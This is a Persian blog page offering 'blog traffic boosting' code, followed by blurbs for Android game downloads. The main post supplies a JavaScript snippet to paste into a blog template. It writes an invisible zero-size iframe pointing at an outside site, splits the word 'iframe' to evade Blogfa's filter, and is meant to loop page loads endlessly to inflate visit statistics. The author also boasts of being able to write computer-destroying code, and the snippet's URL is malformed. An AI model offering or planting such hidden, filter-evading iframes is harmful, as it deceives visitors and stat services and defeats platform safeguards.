کد افزایش امار وبلاگ

کد افزایش امار وبلاگ

کد افزایش امار وبلاگ

دانلودسرا

خوش آمدید
اخبار:

نویسندگان
مطالب تصادفی
کد افزایش امار وبلاگ

کد افزایش آمار وبلاگ

بازدید : 30575 تاریخ : پنجشنبه 31 فروردين 1391زمان : 14:43
 

بعضی ها فکر می کنن که داخل اینترنت هر کدی که هست خوبه ولی فکر نمی کنن که بعضی ها برای افزایش آمار بازدید خودشون دارن این کد ها رو مینویسن.

مثلا در کدی که اگر داخل اینترنت کد افزایش آمار رو سرچ کنین چندین سایت کد ساعتی رو بهتون میدن که اینو بهتون میده ولی در این سایت ها یا وبلاگ ها که یکیشون اینه: http://www.gotomoney.mihanblog.com کدی  رو درست کرده و داخل قالبش بیشتر از 100 تا کد iframe که داخل این کد یه سایت دیگه داخل وبلاگش باز میشه رو گذاشته و بعد با این عنوانی که منم گذاشتم کدی رو درست کرده که همون کد iframe رو کنار یه کد ساعت گذاشته که به وبلاگ خودش وصل میشه و با اون انگار یه 200 تا سایتی رفتی.

من هم میتونم این کار رو کنم ولی چه فایده داره؟ من هر چی باشه آدمم و کدهایی می تونم بسازم که کل کامپیوترتون رو نابود کنه مثلا دستگاه سی دی خوان کامپیوترتون رو در میاره و ویروس وارد کامپیوترتون می کنه و خیلی کار های وحشت ناک دیگه که اگه بگم خیلی ها دوست دارن یاد بگین.

امروز یه نفر از دوستانم از خواست که کد افزایش آمار رو بهش بدم. منم گشتم دنبالش و پیداش کردم. از دوستم عذر می خوام که اینو می گم ولی اون کد ساعتی که گفتم دارم قدیما فکر می کردم این واقعی که البته مال سه چهار ماه پیش بود که چیزی بلد نبودم. ولی در هر حال ما کد نویسا کم نمیاریم یه کد برات درست کردم که داخل این کد من یه صفحه جدید داخل وب خودم درست کردم که آدرس وبلاگتو در قالب کد iframe گذاشتم توش و بعد کد زیر رو اگه تو هم بذاری تو وبلاگت هر کس بیاد تو وبلاگت از اون صفحه میره تو وبلاگت و از وبلاگت میره تو صفحه و همینطور تا قیام قیامت ادامه داره. البته کلمه iframe در بلاگفا یه جورایی فیلتر شده ولی بازم ما کدنویسا کم نمیاریم و کلمه iframe رو با استفاده از جاوا اسکریپت تجزیه کردم و داخلش کلمه iframe رو به دو کلمه ifr و  ame تقسیم کردم تا دوتاش پیش هم نباشه و سیستم بلاگفا نفهمه. ولی با وجود این استفاده نکنی بهتره. البته بعضی از مرورگر ها وقتی اینجوری باشه که صفحه ای لود شدنش تموم نشه (دقیقا مثل چیزی که طراحی کردم) از ادامه دادنش جلو گیری می کنه. حداقل فایرفاکس که اینجوریه. در ضمن این کد تا اونجایی که میدونم در لیست سیاه گوگل قرار نمی گیره چون کد iframe کاملا مجازه اما خیلی ها استفاده از این کد رو زیاد خوب نمی دونن حالا چرا نمی دونم.

 

 این کد را در قالب وبلاگ خود قراردهید  <script type="text/javascript">document.write('<center><ifr');  document.write ('ame width="0px" height="0px"  src="http://moisrex..com/" style="border:  0px;"');document.write (' border="0"  scrolling="no"></ifr');document.write  ('ame>');</script>    

 

 

 

 

این کد هم برای افزایش امار بازدید هست <script type="text/javascript">document.write('<center><ifr');  document.write ('ame width="0px" height="0px"  src="http://moisrex..com/" style="border:  0px;"');document.write (' border="0"  scrolling="no"></ifr');document.write('ame>');</script>

دانلود بازی رایگان مورچه ها

 دانلود بازی رایگان  مورچه ها

بازی های اندروید رایگان

 ایا می خواهید با دانلود بازی بسیار زیبا و مهیج نابود سازی مورچه ها مدت ها سرگرم شوید و کورس امتیاز با دوستان خودتان بذارید؟در این مطلب از سایت نیو فور آندروید ، قصد داریم شما کاربران عزیز را با یکی از پر طرفدارترین بازی های تاریخ آندروید آشنا کنیم !

پیش نیاز : آندروید ۲٫۱ و بالاتر

۶۵ میلیون دانلود از مارکت آندروید برای Ant Smasher یک افتخار بزرگ به حساب می آید ! در این بازی محبوب و پر طرفدار ، بایست مورچه هایی که بر روی صفحه نمایش شما ظاهر می شوند را با انگشتان خود نابود کنید ! یک بازی بسیار جذاب و سرگرم کننده برای کودکان ! سرعت خود را در کشتن مورچه ها افزایش دهید ، مهم نیست شخص بازی کننده دختر یا پسر باشد ، رقابت جالبی شکل خواهد گرفت ، مراقب باشید ! تنها مورچه ها نیستند ! نباید زنبورهای عسل را لمس کنید ، این بازی محبوب مناسب برای تمامی افراد ، بدون هیچگونه محدودیت سنی ! امیدواریم از گذران اوقات بیکاری خود با Ant Smasher لذت ببرید.

Rating: 3.7/5 (747 votes cast)

 

 دانلود بازی جذاب اندروید

بازی های اندروید

 در این مطلب از سایت نیو فور آندروید ، جدیدترین نسخه از سری بازی های جذاب و پرطرفدار Subway Surfers را برای دانلود شما کاربران اسمارت فون ها و تبلت های آندرویدی آماده کرده ایم.

پیش نیاز : آندروید ۲٫۳٫۳ و بالاتر

همانطور که احتمالاً با سری بازی های Subway Surfers آشنا هستید ، در این بازی نیز باید مطابق همیشه ، هدایت دونده ای با نام Jack را بر عهده خواهید داشت. جم در حال فرار از دست مأموران مترو است ، در هر یک از نسخه های این بازی ، جک در متروهای یکی از نقاط جهان در حال فرار از مأموران است. در این نسخه ، جک به کشور هندوستان می رود ! یک بازی جذاب و هیجانی را در خیابان های بمبئی تجربه کنید ! روند کلی این بازی به این شکل است که مأموران مترو به دنبال شما می دوند و شما باید با فرار از دست آنان لحظه به لحظه امتیاز خود را افزایش دهید. البته مراقب موانع نیز باشید ! در اوایل این بازی ممکن است با خود بگوئید به سادگی در حال کسب امتیاز هستید ، اما با گذشت اندکی از زمان ، موانع سختی در پیش رویتان ظاهر می شود که گذر از آنان ، نیازمند دقت و سرعت عمل بسیار بالا خواهد بود. امیدواریم لذت ببرید.

Rating: 3.6/5 (1516 votes cast)
دانلود بازی های استراتژیک اندروید

 دانلود بازی های استراتژیک اندروید

بازی های اندروید

 آیا می خواهید با دانلود بازی بسیار زیبا و مهیج در سبک استراتژیک مدت ها در اندروید خود سرگرم شوید.در این مطلب از سایت نیو فور آندروید ، قصد داریم شما کاربران گرامی را با بازی جدید و بسیار زیبای نبرد ساحلی اشنا کنیم. یک بازی زیبا برای طرفداران سبک استراتژیک !

پیش نیاز : آندروید ۲٫۳ و بالاتر

حیات مردان شما در خطر است ! غارتگران با بی توجهی به قوانین ، در حال نابودسازی آخرین بقایای تمدن شما هستند ، اکنون بقای مردان شما به عملکرد شما بستگی دارد ، شما بایست با مبارزه با عوامل هرج و مرج نظم و قانون را به این تمدن بازگردانید. در کوتاه ترین زمان ممکن ، قدرتمندترین اتحاد را در جزیره تشکیل دهید ، نیروهای نظامی خود را جمع آوری و پایه و اساس قدرت خود را بنا کنید ، همزمان با شما ، هزاران شخص بازی کننده دیگر در سراسر دنیا مشغول این کار هستند ! نبرد ساحلی ترکیبی از نماهای جالب و سرگرم کننده از قبیل ساختمان ها ، برج های دفاعی و… است ، ارتش خود را با حضور مجموعه ای از نیروها از قبیل تک تیر اندازها، تانک ها و سایر زحمت کشان قدرتمند و قدرتمند کنید تا مجموعه غارتگران را از صحنه تمدن خود پاک سازی نمایید. امیدواریم لذت ببرید.

Rating: 3.7/5 (833 votes cast)
دانلود بازی ورزشی بیلیارد اندروید ۲۰۱۴

 

 دانلود بازی ورزشی بیلیارد اندروید ۲۰۱۴

بازی اندروید جدید

 آیا می خواهید با دانلود بازی بیلیار سه بعدی و زیبا این ورزش دوست داشتنی را به اندروید خودتون بیاورید؟پیشنهاد ما دانلود این بازی است.در این مطلب از سایت نیو فور آندروید ، می خواهیم شما دوست داران بازی محبوب بیلیارد را با یک بازی هیجان انگیز و بسیار زیبا آشنا کنیم. بیلیارد تمام سه بعدی برای اسمارت فون ها و تبلت های آندرویدی ! از این پس می توانید هیجان این بازی دوست داشتنی را همیشه همراه خود داشته باشید.

پیش نیاز : آندروید ۲٫۳ و بالاتر

Pool Break Pro 3D مجموعه ای از محبوب ترین بازی های بیلیارد از قبیل Pool, Snooker, Billiards, Crokinole و Carrom را در خود جای داده است ، می توانید متناسب با علاقه خود به کمک هر یک از آنان اوقات فراغت خود را بگذرانید. با بهره گیری از سیستم سه بعدی این بازی ، محیط آن کاملاً با واقعیت مطابقت داشته و شما را در فضایی طبیعی از یک رقابت سرسخت قرار می دهد ، یکی از جذاب ترین قابلیت های گنجانده شده در این بازی سیستم بازی آنلاین آن است ، بنابراین می توانید هر زمان که بخواهید با کاربران انواع دستگاه های قابل حمل این بازی را به صورت جهانی انجام داده و رکورد های خود را به ثبت برسانید. Pool Break Pro 3D ده ها نوع از محبوب ترین بازی های میز بیلیارد را در دستگاه قابل حمل شما جای می دهد ؛ در حین بازی برای دقت و تمرکز بیشتر ، خطوط حرکت توپ ها نیز برایتان نمایش داده می شود. امیدواریم لذت ببرید.

Rating: 3.8/5 (933 votes cast)
دانلود بازی های ورزشی ۲۰۱۴

 دانلود بازی های ورزشی ۲۰۱۴

بازی های برتر اندروید

 آیا می خواهید با بازی ورزشی جدید و زیبا اسکیت برد را به اندروید خود بیاورید؟در این مطلب از سایت نیو فور آندروید ، با شبیه سازی یک اسکیت برد حرفه ای خدمت شما کاربران اسمارت فون ها و تبلت های آندرویدی رسیده ایم.

پیش نیاز : آندروید ۲٫۳ و بالاتر

برترین بازی اسکیت برد در آندروید مارکت ! یک بازی ورزشی و بسیار سرگرم کننده برای علاقمندان به اسکیت برد بدون زخمی شدن زانوها ! لمس و تجربه فضایی ورزشی در یک پیست خاص برای انجام بازی اسکیت برد ؛ در ابتدای بازی مجموعه ای از حرکات و آموزش ها در اختیارتان قرار می گیرد که باید آنان را مطابق با آموزش های داخلی پشت سر بگذارید ، از جمله این حرکات می توان به نحوه حرکت ، کنترل جهت ها ، پرش ، کسب امتیاز و تعدادی از تکنیک های حرفه ای اشاره کرد ؛ با گذر از مراحل تمرینی وظایف اصلی شما آغاز می شود. اکنون بایست مأموریت های پیش رویتان را مطابق با خواستهی داخلی بازی پشت سر بگذارید ، شما می توانید یک مأموریت را چندین مرتبه پشت سر بگذارید و هر بار امتیاز بیشتری را به ثبت برسانید. فضای بازی در یک پارک شبیه سازی شده و یک گرافیک صاف و دوست داشتنی ، شما را برای انجام مراحل ترغیب می کند. امیدواریم لذت ببرید.

Rating: 3.7/5 (1546 votes cast)
دانلود بازی کشاورزی جدید

 دانلود بازی کشاورزی جدید

Farming Simulator1

 یا دانلود بازی های ساده و سرگرم کننده چه طورید؟بازی کشاورزی را تجربه کنید.اگر از گیمرهای بازی های رایانه ای باشید ، حتما با سری بازی های Simulator یا همان شبیه سازی آشنایی دارید. بازی معروف و دوست داشتنی Farming Simulator که تا چندی پیش تنها بر روی رایانه های شخصی و سیستم عامل ویندوز قابل اجرا بود ، این بار برای سیستم عامل آندروید و متناسب با انواع اسمارت فون ها و تبلت ها منتشر شده است.

پیش نیاز : آندروید ۲٫۱ و بالاتر

کشاوری خود را در گوشی همراه و یا تبلت آندرویدی خود با Farming Simulator 14 آغاز کنید ! مزرعه ی خود را مدیریت و تحت نظارت خود قرار دهید و به اهداف و روش های آبادسازی آن پی برده و آن را توسعه دهید ؛ همانطور که از عنوان این بازی پیداست ، با یک شبیه ساز بسیار طبیعی در زمینه مزرعه داری رو به رو هستیم ، این بازی مجموعه ای از ابزار مورد نیاز و مهم را در گسترش مزرعه از قبیل Case IH, Deutz-Fahr, Lamborghini, Kuhn, Amazone و Krone در اختیار شما قرار می دهد. گیم پلی ۳ بعدی این بازی با نماهایی بسیار طبیعی ، شما را به طور ساده و جذاب با محیط کشاوری آشنا می نماید و مهارت های شما را در این زمینه محک می زند. با بهره گیری از ارتباط های بلوتوث و وای فای ، می توانید رقابت های خود را در فضایی رایگان با دوستان خود به اجرا دراورید ، با بهره گیری از ابزارهایی که در اختیارتان قرار می گیرد به گسترش زمین کشاوری خود بپردازید و با تولید ذرت ، آرد و… آنان را در بازار به فروش برسانید و با کسب درآمد روز افزون ، مزرعه را گسترش دهید. امیدواریم از این بازی زیبا لذت ببرید.

Rating: 3.8/5 (2571 votes cast)
دانلود آخرین ورژن بازی پرندگان خشمگین

 دانلود آخرین ورژن بازی پرندگان خشمگین

بازی های اندروید جدید

 حتما تا به حال بازی های پرندگان خشمگین را دانلودکرده اید.کنون با معرفی یکی دیگر از سری بازی های جذاب و پرطرفدار پرندگان عصبانی خدمت شما کاربران دستگاه های آندرویدی هستیم ! پرندگان عصبانی نسخه فصل ها ، این بار با قابلیت هایی جدید ، محیطی رنگارنگ و دوست داشتنی و مراحلی جدید و بسیار هیجان انگیز قصد دارد شما را تا ساعت ها با اسمارت فون و یا تبلت خود سرگرم کند !

پیش نیاز : آندروید ۲٫۳ و بالاتر

نسخه فصل ها از بازی محبوب پرندگان عصبانی ، گیم پلیر نسخه اصلی سری بازی های Angry Birds را در کنار مراحلی جدید و بسیار متفاوت به دستگاه های شما می آورد. از هالووین گرفته تا جشن سال نو در کشور چین ! پرندگان عصبانی در حال جشن گرفتن تمامی روزهای مهم در کشورهای مختلف دنیا هستند ؛ با مجموعه ای بیش از ۳۰۰ مرحله اعتیاد آور و بسیار جذاب با آپدیت ها و جوایز رایگان ! لذت یک بازی متفاوت با اشیائی جالب نظیر تخم مرغ های طلائی و کدوهای تنبل مخصوص جشن هالووین ! مراحلی سرگرم کننده و در عین حال فکری که مهارت شما را در پشت سر گذاشتن پازل ها به چالش می کشد ؛ با بیش از ۱ میلیارد دانلود سری بازی های پرندگان عصبانی ، بازی های Angry Birds پرطرفدارترین سری بازی ها در فروشگاه های اپ استور و آندروید مارکت به شمار می روند. امیدواریم لذت ببرید.

Rating: 3.7/5 (1904 votes cast)
دانلود بازی پازل جواهرات رنگی

 دانلود بازی پازل جواهرات رنگی 

نرم افزار های اندروید

 نظرتان با دانلود بازی مفرح و سرگرم کننده چیست؟ در این مطلب از سایت نیو فور آندروید ، قصد داریم یک بازی جدید و رنگارنگ را با نام Bejeweled خدمت شما کاربران دیوایس های آندرویدی معرفی کنیم.

پیش نیاز : آندروید ۲٫۳٫۳ و بالاتر

روندی آشنا در بازی های سرگرم کننده به صورت حذف الماس های رنگین از محیط بازی ! یک بازی سرگرم کننده که ضمن دارا بودن محیطی جذاب و شادی بخش ، گاهاً مراحلی سخت و دشوار را در پیش رویتان قرار می دهد. بازی های حذف اشیاء در سراسر دنیا طرفدارانی خاص و گاهاً سرسخت را به خود اختصاص داده است ، Bejeweled Blitz نام یکی از معروف ترین این بازی هاست که طرفداران بسیاری را در مارکت آندروید و اپ استور به خود اختصاص داده است. برای کسب امتیاز در این بازی لازم است الماس های هم رنگ را در کنار یکدیگر قرار داده و با حذف آنان هر لحظه امتیازات خود را افزایش دهید. از مهم ترین امکانات این بازی می توان به محیط رنگارنگ با وضوح HD ، صداهای جذاب و همچنین ابزارهایی اضافی جهت افزایش قدرت پلیر اشاره کرد. امیدواریم لذت ببرید.

Rating: 3.9/5 (748 votes cast)

ادامه مطلب

دانلود بازی موش و گربه مخصوص اندروید

 دانلود بازی موش و گربه مخصوص اندروید

بهترین بازی ها برای دانلود اندروید

 حتما تا به حال نام کارتون موش و گربه را شنیده اید؟این بازی را برای اندروید خود دانلودکنید و لذت ببرید.در این مطلب از سایت نیو فور آندروید ، یک بازی اعتیادآور و فکری را برای اوغات فراغت شما کاربران دستگاه های آندرویدی در نظر گرفته ایم. با ما در معرفی بازی جدید Trip Trap ساخته ی سازندگان بازی محبوب iSlash همراه باشید.

پیش نیاز : آندروید ۲٫۳ و بالاتر

یک بازی بسیار دوست داشتنی و در عین حال فکری و سرگرم کننده ! مراحل این بازی را به سادگی فرا می گیرید و همچنین علاقه بسیاری به کامل کردن آنان پیدا خواهید کرد ؛ دوست کوچک ما با نام Ched و نام مستعار Cheddar بسیار گرسنه است و برای رسیدن به پنیرهای مورد علاقه اش ، نیازمند کمک شماست ! اشتباه نکنید ، هدایت این کاراکتر دوست داشتنی کار آسانی نیست ! شما باید با دوری از تله های موجود در مسیر ، او را تا هدف مورد نظر هدایت کنید ، این مسیرها بسیار خطرناک هستند و گذر از آنان نیازمند دقت بالایی است ؛ ۴ اتاق مختلف و بیش از ۸۰ مرحله مختلف از مهم ترین نقاط جذاب این بازی است. امیدواریم لذت ببرید.

Rating: 3.8/5 (2635 votes cast)
پنل کاربری
نام کاربری
رمز عبور
عضویت سریع
نام کاربری
رمز عبور
تکرار رمز
ایمیل
کد تصویری
تبادل لینک هوشمند

تبادل لینک هوشمند
برای تبادل لینک  ابتدا ما را با عنوان دانلودسرا و آدرس djsina3.LXB.ir لینک نمایید سپس مشخصات لینک خود را در زیر نوشته . در صورت وجود لینک ما در سایت شما لینکتان به طور خودکار در سایت ما قرار میگیرد.






درباره ی سایت
به وبلاگ من خوش آمدید